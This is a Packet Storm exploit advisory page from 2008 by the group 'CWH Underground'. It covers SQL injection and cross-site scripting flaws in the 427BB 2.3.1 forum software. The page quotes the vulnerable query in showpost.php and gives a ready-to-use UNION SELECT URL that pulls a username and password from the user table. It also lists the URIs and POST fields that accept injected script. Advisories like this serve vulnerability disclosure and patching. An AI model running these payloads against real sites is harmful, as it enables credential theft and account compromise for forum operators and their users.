exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

426bb-sqlxss.txt

426bb-sqlxss.txt
Posted Jun 5, 2008
Authored by CWH Underground | Site citecclub.org

427BB version 2.3.1 suffers from SQL injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | e5b719c9648f8adac417dd67a798ac78bf7c99d095792e36a84ca712ecd83756

426bb-sqlxss.txt

Change Mirror Download
============================================================
427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities
============================================================

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

AUTHOR : CWH Underground
DATE : 4 June 2008
SITE : www.citec.us


#####################################################
APPLICATION : 427BB
VERSION : 2.3.1
DOWNLOAD : http://fourtwosevenbb.sourceforge.net/
#####################################################

---SQL Injection Exploit [showpost.php]---

##############################################
Vulnerable: showpost.php

118: $sql = "SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From " . $t_prefix . "Posts WHERE ID=$post_id";
119:
120: $res = mysql_query($sql);

###############################################

Exploit:

http://[target]/[path]/showpost.php?ForumID=1&post=1 union select 1,UserName,3,4,5,Password,7 FROM 427bb_personal WHERE ID=1--



---Multiple Remote XSS Exploit---

###########
XSS in URI
###########

Example:

http://[target]/[path]/register.php/<XSS>
http://[target]/[path]/reminder.php/<XSS>
http://[target]/[path]/search.php/<XSS>

####################
XSS with POST Method
####################

Example:

http://[target]/[path]/register.php
[-]POST variable "uname"
[-]POST variable "email"
[-]POST variable "email2"

http://[target]/[path]/reminder.php
[-]POST variable "email"

http://[target]/[path]/search.php
[-]POST variable "keywords"

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close